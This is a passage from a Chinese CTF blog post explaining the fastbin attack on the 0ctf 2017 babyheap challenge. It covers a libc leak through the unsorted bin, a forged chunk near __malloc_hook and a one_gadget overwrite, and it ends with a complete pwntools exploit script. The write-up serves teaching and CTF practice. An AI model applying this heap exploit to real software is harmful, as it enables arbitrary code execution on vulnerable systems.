<h4 id="利用题目的打印函数，获得泄露的地址"><a href="#利用题目的打印函数，获得泄露的地址" class="headerlink" title="利用题目的打印函数，获得泄露的地址"></a>利用题目的打印函数，获得泄露的地址</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">dump(2)</span><br><span class="line"></span><br><span class="line">leak_addr = u64(p.recvuntil(b&#x27;\x7f&#x27;)[-6:].ljust(8, b&#x27;\x00&#x27;))</span><br><span class="line">print(hex((leak_addr)))</span><br><span class="line"></span><br><span class="line">unsorted_offset_addr=unsorted_offset_arena(5)</span><br><span class="line">print(hex(int(unsorted_offset_addr)))</span><br><span class="line">libc_base=leak_addr-unsorted_offset_addr-0x3c4b20</span><br><span class="line"></span><br><span class="line">print(hex(int(libc_base)))</span><br></pre></td></tr></table></figure>



<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954734.png" alt="4-13"></p>
<p>利用main_arena里面unsortedbin的偏移使固定的，找到这里的地址和main_arena的差，再利用main_arena与libc基址有个固定的差值，计算得到libc的基址</p>
<h4 id="申请回unsortedbin-并改成fatsbin的大小后释放，使其进入fastbin的链表"><a href="#申请回unsortedbin-并改成fatsbin的大小后释放，使其进入fastbin的链表" class="headerlink" title="申请回unsortedbin 并改成fatsbin的大小后释放，使其进入fastbin的链表"></a>申请回unsortedbin 并改成fatsbin的大小后释放，使其进入fastbin的链表</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">allo(0x60)</span><br><span class="line">free(4)</span><br></pre></td></tr></table></figure>



<h4 id="接着我们要找一个可以伪造chunk的地址"><a href="#接着我们要找一个可以伪造chunk的地址" class="headerlink" title="接着我们要找一个可以伪造chunk的地址"></a>接着我们要找一个可以伪造chunk的地址</h4><p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954735.png" alt="4-14"></p>
<p>因为我们的目的是改掉malloc这里的地址，所以我们要在这个附近找到一个可以改写这个地址的chunk</p>
<p>我们使用find_fake_fast这个工具来找(find_fake_fast+被写入地址+chunk大小)</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954736.png" alt="4-15"></p>
<p>找到了，并且计算偏移</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">print(hex(int(libc_base+0x3c4aed)))</span><br><span class="line"></span><br><span class="line">payload=p64(int(libc_base+0x3c4aed))#0x3c4aed</span><br></pre></td></tr></table></figure>

<p>因为chunk2是指向chunk4的地址的，我们通过这里改写chunk4的fd地址，使我们伪造的chunk进入fastbin中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fill(2,len(payload),payload)</span><br></pre></td></tr></table></figure>



<h4 id="申请两个chunk，使我们可以利用伪造的chunk"><a href="#申请两个chunk，使我们可以利用伪造的chunk" class="headerlink" title="申请两个chunk，使我们可以利用伪造的chunk"></a>申请两个chunk，使我们可以利用伪造的chunk</h4><p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954737.png" alt="4-16"></p>
<p>可以看到我们chunk6的位置是 我们伪造的chunk</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954738.png" alt="4-17"></p>
<p>通过计算偏移，讲malloc的位置写入one_gadget</p>
<p>最后随便malloc触发one_gadget</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">gadgets=int(libc_base+0x4526a)</span><br><span class="line">payload =b&#x27;a&#x27;*0x13 + p64(gadgets)</span><br><span class="line"></span><br><span class="line">fill(6, len(payload), payload)</span><br><span class="line"></span><br><span class="line">allo(255)</span><br><span class="line">p.interacti</span><br></pre></td></tr></table></figure>



<h4 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">#context.terminal = [&#x27;gnome-terminal&#x27;, &#x27;-x&#x27;, &#x27;sh&#x27;, &#x27;-c&#x27;]</span><br><span class="line">context(log_level=&#x27;debug&#x27;)</span><br><span class="line">#p=remote(&#x27;node5.buuoj.cn&#x27;,25676)</span><br><span class="line">p=process(&#x27;./babyheap&#x27;)</span><br><span class="line">def debug():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line">def allo(size):</span><br><span class="line">    p.recvuntil(b&#x27;Command:&#x27;)</span><br><span class="line">    p.sendline(b&#x27;1&#x27;)</span><br><span class="line">    p.sendlineafter(b&#x27;Size:&#x27;,str(size))</span><br><span class="line"></span><br><span class="line">def fill(index,size,content):</span><br><span class="line">    p.recvuntil(b&#x27;Command:&#x27;)</span><br><span class="line">    p.sendline(b&#x27;2&#x27;)</span><br><span class="line">    p.sendlineafter(b&#x27;Index:&#x27;,str(index))</span><br><span class="line">    p.sendlineafter(b&#x27;Size:&#x27;,str(size))</span><br><span class="line">    p.sendafter(b&#x27;Content:&#x27;,content)</span><br><span class="line"></span><br><span class="line">def free(index):</span><br><span class="line">    p.recvuntil(b&#x27;Command:&#x27;)</span><br><span class="line">    p.sendline(b&#x27;3&#x27;)</span><br><span class="line">    p.sendlineafter(b&#x27;Index:&#x27;,str(index))</span><br><span class="line"></span><br><span class="line">def dump(index):</span><br><span class="line">    p.recvuntil(b&#x27;Command:&#x27;)</span><br><span class="line">    p.sendline(b&#x27;4&#x27;)</span><br><span class="line">    p.sendlineafter(b&#x27;Index:&#x27;,str(index))</span><br><span class="line">    p.recvuntil(b&#x27;Content:&#x27;)</span><br><span class="line"></span><br><span class="line">def exit():</span><br><span class="line">    p.recvuntil(b&#x27;Command: \n&#x27;)</span><br><span class="line">    p.sendline(b&#x27;5&#x27;)</span><br><span class="line"></span><br><span class="line">def unsorted_offset_arena(idx):</span><br><span class="line">    word_bytes = context.word_size / 8</span><br><span class="line">    offset = 4  # lock</span><br><span class="line">    offset += 4  # flags</span><br><span class="line">    offset += word_bytes * 10  # offset fastbin</span><br><span class="line">    offset += word_bytes * 2  # top,last_remainder</span><br><span class="line">    offset += idx * 2 * word_bytes  # idx</span><br><span class="line">    offset -= word_bytes * 2  # bin overlap</span><br><span class="line">    return offset</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">allo(0x10)</span><br><span class="line">allo(0x10)</span><br><span class="line">allo(0x10)</span><br><span class="line">allo(0x10)</span><br><span class="line">allo(0x80)</span><br><span class="line">allo(0x70)</span><br><span class="line">debug()</span><br><span class="line">free(2)</span><br><span class="line"></span><br><span class="line">free(1)</span><br><span class="line"></span><br><span class="line">payload=p64(0)*3+p64(0x21)+p8(0x80)</span><br><span class="line">pause()</span><br><span class="line">fill(0,len(payload),payload)</span><br><span class="line"></span><br><span class="line">payload1=b&#x27;a&#x27;*0x10+p64(0)+p64(0x21)</span><br><span class="line">pause()</span><br><span class="line">fill(3,len(payload1),payload1)</span><br><span class="line"></span><br><span class="line">allo(0x10)</span><br><span class="line"></span><br><span class="line">allo(0x10)</span><br><span class="line"></span><br><span class="line">payload1=b&#x27;a&#x27;*0x10+p64(0)+p64(0x91)</span><br><span class="line">pause()</span><br><span class="line">fill(3,len(payload1),payload1)</span><br><span class="line"></span><br><span class="line">free(4)</span><br><span class="line"></span><br><span class="line">dump(2)</span><br><span class="line">pause()</span><br><span class="line">leak_addr = u64(p.recvuntil(b&#x27;\x7f&#x27;)[-6:].ljust(8, b&#x27;\x00&#x27;))</span><br><span class="line">print(hex((leak_addr)))</span><br><span class="line"></span><br><span class="line">unsorted_offset_addr=unsorted_offset_arena(5)</span><br><span class="line">print(hex(int(unsorted_offset_addr)))</span><br><span class="line">libc_base=leak_addr-unsorted_offset_addr-0x3c4b20</span><br><span class="line"></span><br><span class="line">print(hex(int(libc_base)))</span><br><span class="line"></span><br><span class="line">pause()</span><br><span class="line">allo(0x60)</span><br><span class="line">free(4)</span><br><span class="line">print(hex(int(libc_base+0x3c4aed)))</span><br><span class="line"></span><br><span class="line">payload=p64(int(libc_base+0x3c4aed))#0x3c4aed</span><br><span class="line"></span><br><span class="line">fill(2,len(payload),payload)</span><br><span class="line"></span><br><span class="line">allo(0x60)</span><br><span class="line">allo(0x60)</span><br><span class="line"></span><br><span class="line">pause()</span><br><span class="line">gadgets=int(libc_base+0x4526a)</span><br><span class="line">payload =b&#x27;a&#x27;*0x13 + p64(gadgets)</span><br><span class="line"></span><br><span class="line">fill(6, len(payload), payload)</span><br><span class="line"></span><br><span class="line">allo(255)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="参考的大佬的博客"><a href="#参考的大佬的博客" class="headerlink" title="参考的大佬的博客"></a>参考的大佬的博客</h2><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41202237/article/details/109284167">好好说话之Fastbin Attack（2）：House Of Spirit_fastbin attack house of spirit-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41202237/article/details/111300546">好好说话之Fastbin Attack（3）：Alloc to Stack_large bin attack-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41202237/article/details/112320919">好好说话之Fastbin Attack（4）：Arbitrary Alloc_好好说话 ctf-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/haidragon/p/17016393.html">lctf2016_pwn200 堆利用 - syscallwww - 博客园 (cnblogs.com)</a></p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta"><i class="fas fa-circle-user fa-fw"></i>文章作者: </span><span class="post-copyright-info"><a href="http://example.com">鱼非愚</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta"><i class="fas fa-square-arrow-up-right fa-fw"></i>文章链接: </span><span class="post-copyright-info"><a href="http://example.com/2024/10/08/fastbin-attack/">http://example.com/2024/10/08/fastbin-attack/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta"><i class="fas fa-circle-exclamation fa-fw"></i>版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://example.com" target="_blank">鱼非愚</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/heap/">heap</a></div><div class="post_share"><div class="social-share" data-image="https://www.dmoe.cc/random.php?type=bg&amp;ctype=acg?3138" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><div class="post-reward"><div class="reward-button"><i class="fas fa-qrcode"></i>赞助</div><div class="reward-main"><ul class="reward-all"><li class="reward-item"><a href="https://wx.qq.com/" target="_blank"><img class="post-qr-code-img" src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412112007866.jpg" alt="wechat"/></a><div class="post-qr-code-desc">wechat</div></li></ul></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2024/10/22/ret2csu%E5%8F%8A%E4%BE%8B%E9%A2%98/" title="ret2csu及例题"><img class="cover" src="https://www.dmoe.cc/random.php?type=bg&amp;ctype=acg?1066" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">ret2csu及例题</div></div></a></div><div class="next-post pull-right"><a href="/2024/09/26/buu%E5%88%B7%E9%A2%98%E8%84%9A%E6%9C%AC/" title="buu刷题脚本"><img class="cover" src="https://www.dmoe.cc/random.php?type=bg&amp;ctype=acg?7906" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">buu刷题脚本</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><div><a href="/2024/11/05/hitcon-2018-children-tcache%E9%A2%98%E8%A7%A3/" title="hitcon_2018_children_tcache题解"><img class="cover" src="https://www.dmoe.cc/random.php?type=bg&ctype=acg?9619" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2024-11-05</div><div class="title">hitcon_2018_children_tcache题解</div></div></a></div></div></div><hr class="custom-hr"/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> 评论</span></div></div><div class="comment-wrap"><div><div id="giscus-wrap"></div></div></div></div></div><div class="aside-content" id="aside-content"><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#fastbin-attack"><span class="toc-number">1.</span> <span class="toc-text">fastbin_attack</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#double-free"><span class="toc-number">1.1.</span> <span class="toc-text">double free</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#house-of-spirit"><span class="toc-number">1.2.</span> <span class="toc-text">house of spirit</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98%EF%BC%9Alctf2016-pwn200"><span class="toc-number">1.2.1.</span> <span class="toc-text">例题：lctf2016_pwn200</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Alloc-to-stack"><span class="toc-number">1.3.</span> <span class="toc-text">Alloc_to_stack</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Arbitrary-Alloc"><span class="toc-number">1.4.</span> <span class="toc-text">Arbitrary Alloc</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98%EF%BC%9A0ctf-2017-babyheap"><span class="toc-number">1.4.1.</span> <span class="toc-text">例题：0ctf_2017_babyheap</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%88%91%E4%BB%AC%E5%85%88%E5%88%9B%E5%BB%BA6%E4%B8%AA%E5%A0%86%E5%BF%AB"><span class="toc-number">1.4.1.1.</span> <span class="toc-text">我们先创建6个堆快</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%85%88%E9%87%8A%E6%94%BE%E7%AC%AC%E4%B8%89%E4%B8%AA%E5%A0%86%E5%9D%97%EF%BC%8C%E5%86%8D%E9%87%8A%E6%94%BE%E7%AC%AC%E4%BA%8C%E4%B8%AA%E5%A0%86%E5%BF%AB"><span class="toc-number">1.4.1.2.</span> <span class="toc-text">先释放第三个堆块，再释放第二个堆快</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%88%91%E4%BB%AC%E9%80%9A%E8%BF%87chunk0%E8%BF%9B%E8%A1%8C%E5%A0%86%E6%BA%A2%E5%87%BA%EF%BC%8C%E4%BD%BFchunk1-chunk5"><span class="toc-number">1.4.1.3.</span> <span class="toc-text">我们通过chunk0进行堆溢出，使chunk1-&gt;chunk5</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%88%91%E4%BB%AC%E5%86%8D%E6%8A%8Achun5%E7%9A%84size%E6%94%B9%E4%B8%BA0x20%EF%BC%8C%E4%B8%8D%E8%AE%A9%E6%8E%A5%E4%B8%8B%E6%9D%A5%E6%97%A0%E6%B3%95%E6%8A%8A%E9%87%8D%E6%96%B0%E7%94%B3%E8%AF%B7%E5%9B%9E%E6%9D%A5"><span class="toc-number">1.4.1.4.</span> <span class="toc-text">我们再把chun5的size改为0x20，不让接下来无法把重新申请回来</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%94%B9%E5%9B%9Echunk4%E7%9A%84%E5%A4%A7%E5%B0%8F%EF%BC%8C%E5%B9%B6%E9%87%8A%E6%94%BE"><span class="toc-number">1.4.1.5.</span> <span class="toc-text">改回chunk4的大小，并释放</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E9%A2%98%E7%9B%AE%E7%9A%84%E6%89%93%E5%8D%B0%E5%87%BD%E6%95%B0%EF%BC%8C%E8%8E%B7%E5%BE%97%E6%B3%84%E9%9C%B2%E7%9A%84%E5%9C%B0%E5%9D%80"><span class="toc-number">1.4.1.6.</span> <span class="toc-text">利用题目的打印函数，获得泄露的地址</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%94%B3%E8%AF%B7%E5%9B%9Eunsortedbin-%E5%B9%B6%E6%94%B9%E6%88%90fatsbin%E7%9A%84%E5%A4%A7%E5%B0%8F%E5%90%8E%E9%87%8A%E6%94%BE%EF%BC%8C%E4%BD%BF%E5%85%B6%E8%BF%9B%E5%85%A5fastbin%E7%9A%84%E9%93%BE%E8%A1%A8"><span class="toc-number">1.4.1.7.</span> <span class="toc-text">申请回unsortedbin 并改成fatsbin的大小后释放，使其进入fastbin的链表</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%8E%A5%E7%9D%80%E6%88%91%E4%BB%AC%E8%A6%81%E6%89%BE%E4%B8%80%E4%B8%AA%E5%8F%AF%E4%BB%A5%E4%BC%AA%E9%80%A0chunk%E7%9A%84%E5%9C%B0%E5%9D%80"><span class="toc-number">1.4.1.8.</span> <span class="toc-text">接着我们要找一个可以伪造chunk的地址</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%94%B3%E8%AF%B7%E4%B8%A4%E4%B8%AAchunk%EF%BC%8C%E4%BD%BF%E6%88%91%E4%BB%AC%E5%8F%AF%E4%BB%A5%E5%88%A9%E7%94%A8%E4%BC%AA%E9%80%A0%E7%9A%84chunk"><span class="toc-number">1.4.1.9.</span> <span class="toc-text">申请两个chunk，使我们可以利用伪造的chunk</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#exp"><span class="toc-number">1.4.1.10.</span> <span class="toc-text">exp</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E7%9A%84%E5%A4%A7%E4%BD%AC%E7%9A%84%E5%8D%9A%E5%AE%A2"><span class="toc-number">1.5.</span> <span class="toc-text">参考的大佬的博客</span></a></li></ol></li></ol></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2025 By 鱼非愚</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button id="go-up" type="button" title="回到顶部"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox/fancybox.umd.min.js"></script><div class="js-pjax"><script>(()=>{
  const getGiscusTheme = theme => {
    return theme === 'dark' ? 'dark' : 'light'
  }

  const loadGiscus = () => {
    const config = Object.assign({
      src: 'https://giscus.app/client.js',
      'data-repo': 'yufeiyu33/yfy_source_remark',
      'data-repo-id': 'R_kgDONHzA6g',
      'data-category-id': 'DIC_kwDONHzA6s4Cjz3i',
      'data-mapping': 'pathname',
      'data-theme': getGiscusTheme(document.documentElement.getAttribute('data-theme')),
      'data-reactions-enabled': '1',
      crossorigin: 'anonymous',
      async: true
    },null)

    const ele = document.createElement('script')
    for (let key in config) {
      ele.setAttribute(key, config[key])
    }
    document.getElementById('giscus-wrap').appendChild(ele)
  }

  const changeGiscusTheme = theme => {
    const sendMessage = message => {
      const iframe = document.querySelector('iframe.giscus-frame')
      if (!iframe) return
      iframe.contentWindow.postMessage({ giscus: message }, 'https://giscus.app')
    }

    sendMessage({
      setConfig: {
        theme: getGiscusTheme(theme)
      }
    });
  }

  btf.addGlobalFn('themeChange', changeGiscusTheme, 'giscus')

  if ('Giscus' === 'Giscus' || !true) {
    if (true) btf.loadComment(document.getElementById('giscus-wrap'), loadGiscus)
    else loadGiscus()
  } else {
    window.loadOtherComment= loadGiscus
  }
})()</script></div><canvas id="universe"></canvas><script defer src="/js/universe.js"></script><script defer src="/js/cursor.js"></script><script id="click-heart" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/click-heart.min.js" async="async" mobile="false"></script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><div id="algolia-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">搜索</span><button class="search-close-button"><i class="fas fa-times"></i></button></nav><div class="search-wrap"><div id="algolia-search-input"></div><hr/><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-info"><div class="algolia-stats"></div><div class="algolia-poweredBy"></div></div></div></div></div><div id="search-mask"></div><script src="https://cdn.jsdelivr.net/npm/algoliasearch/dist/algoliasearch-lite.umd.min.js"></script><script src="https://cdn.jsdelivr.net/npm/instantsearch.js/dist/instantsearch.production.min.js"></script><script src="/js/search/algolia.js"></script></div></div><!-- hexo injector body_end start --><script data-pjax>
  function butterfly_clock_anzhiyu_injector_config(){
    var parent_div_git = document.getElementsByClassName('sticky_layout')[0];
    var item_html = '<div class="card-widget card-clock"><div class="card-glass"><div class="card-background"><div class="card-content"><div id="hexo_electric_clock"><img class="entered loading" id="card-clock-loading" src="https://cdn.cbd.int/hexo-butterfly-clock-anzhiyu/lib/loading.gif" style="height: 120px; width: 100%;" data-ll-status="loading"/></div></div></div></div></div>';
    console.log('已挂载butterfly_clock_anzhiyu')
    if(parent_div_git) {
      parent_div_git.insertAdjacentHTML("afterbegin",item_html)
    }
  }
  var elist = 'null'.split(',');
  var cpage = location.pathname;
  var epage = '/';
  var qweather_key = '62d0caaefa6947c58f792c74224381fd';
  var gaud_map_key = 'e2b04289e870b005374ee030148d64fd&s=rsv3';
  var baidu_ak_key = 'undefined';
  var flag = 0;
  var clock_rectangle = '113.34532,23.15624';
  var clock_default_rectangle_enable = 'true';

  for (var i=0;i<elist.length;i++){
    if (cpage.includes(elist[i])){
      flag++;
    }
  }

  if ((epage ==='all')&&(flag == 0)){
    butterfly_clock_anzhiyu_injector_config();
  }
  else if (epage === cpage){
    butterfly_clock_anzhiyu_injector_config();
  }
  </script><script src="https://widget.qweather.net/simple/static/js/he-simple-common.js?v=2.0"></script><script data-pjax src="https://cdn.cbd.int/hexo-butterfly-clock-anzhiyu/lib/clock.min.js"></script><script data-pjax>
  function butterfly_footer_beautify_injector_config(){
    var parent_div_git = document.getElementById('footer-wrap');
    var item_html = '<div id="workboard"></div><p id="ghbdages"><a class="github-badge" target="_blank" href="https://hexo.io/" style="margin-inline:5px" data-title="博客框架为Hexo_v6.2.0" title=""><img src="https://img.shields.io/badge/Frame-Hexo-blue?style=flat&amp;logo=hexo" alt=""/></a><a class="github-badge" target="_blank" href="https://butterfly.js.org/" style="margin-inline:5px" data-title="主题版本Butterfly_v4.3.1" title=""><img src="https://img.shields.io/badge/Theme-Butterfly-6513df?style=flat&amp;logo=bitdefender" alt=""/></a><a class="github-badge" target="_blank" href="https://vercel.com/" style="margin-inline:5px" data-title="本站采用多线部署，主线路托管于Vercel" title=""><img src="https://img.shields.io/badge/Hosted-Vercel-brightgreen?style=flat&amp;logo=Vercel" alt=""/></a><a class="github-badge" target="_blank" href="https://dashboard.4everland.org/" style="margin-inline:5px" data-title="本站采用多线部署，备用线路托管于4EVERLAND" title=""><img src="https://img.shields.io/badge/Hosted-4EVERLAND-22DDDD?style=flat&amp;logo=IPFS" alt=""/></a><a class="github-badge" target="_blank" href="https://github.com/" style="margin-inline:5px" data-title="本站项目由Github托管" title=""><img src="https://img.shields.io/badge/Source-Github-d021d6?style=flat&amp;logo=GitHub" alt=""/></a><a class="github-badge" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" style="margin-inline:5px" data-title="本站采用知识共享署名-非商业性使用-相同方式共享4.0国际许可协议进行许可" title=""><img src="https://img.shields.io/badge/Copyright-BY--NC--SA%204.0-d42328?style=flat&amp;logo=Claris" alt=""/></a></p>';
    console.log('已挂载butterfly_footer_beautify')
    parent_div_git.insertAdjacentHTML("beforeend",item_html)
    }
  var elist = 'null'.split(',');
  var cpage = location.pathname;
  var epage = 'all';
  var flag = 0;

  for (var i=0;i<elist.length;i++){
    if (cpage.includes(elist[i])){
      flag++;
    }
  }

  if ((epage ==='all')&&(flag == 0)){
    butterfly_footer_beautify_injector_config();
  }
  else if (epage === cpage){
    butterfly_footer_beautify_injector_config();
  }
  </script><script async src="https://npm.elemecdn.com/hexo-butterfly-footer-beautify@1.0.0/lib/runtime.js"></script><script data-pjax>
  function butterfly_swiper_injector_config(){
    var parent_div_git = document.getElementById('recent-posts');
    var item_html = '<div class="recent-post-item" style="height: auto;width: 100%"><div class="blog-slider swiper-container-fade swiper-container-horizontal" id="swiper_container"><div class="blog-slider__wrp swiper-wrapper" style="transition-duration: 0ms;"><div class="blog-slider__item swiper-slide" style="width: 750px; opacity: 1; transform: translate3d(0px, 0px, 0px); transition-duration: 0ms;"><a class="blog-slider__img" href="2025/02/18/西湖论剑2025-pwn/" alt=""><img width="48" height="48" src="https://www.dmoe.cc/random.php?type=bg&amp;ctype=acg?7418" alt="" onerror="this.src=https://unpkg.zhimg.com/akilar-candyassets/image/loading.gif; this.onerror = null;"/></a><div class="blog-slider__content"><span class="blog-slider__code">2025-02-18</span><a class="blog-slider__title" href="2025/02/18/西湖论剑2025-pwn/" alt="">西湖论剑2025 pwn</a><div class="blog-slider__text">你永远也不会知道下一次刷新会随机出什么图片</div><a class="blog-slider__button" href="2025/02/18/西湖论剑2025-pwn/" alt="">详情   </a></div></div><div class="blog-slider__item swiper-slide" style="width: 750px; opacity: 1; transform: translate3d(0px, 0px, 0px); transition-duration: 0ms;"><a class="blog-slider__img" href="2024/09/26/buu刷题脚本/" alt=""><img width="48" height="48" src="https://www.dmoe.cc/random.php?type=bg&amp;ctype=acg?7906" alt="" 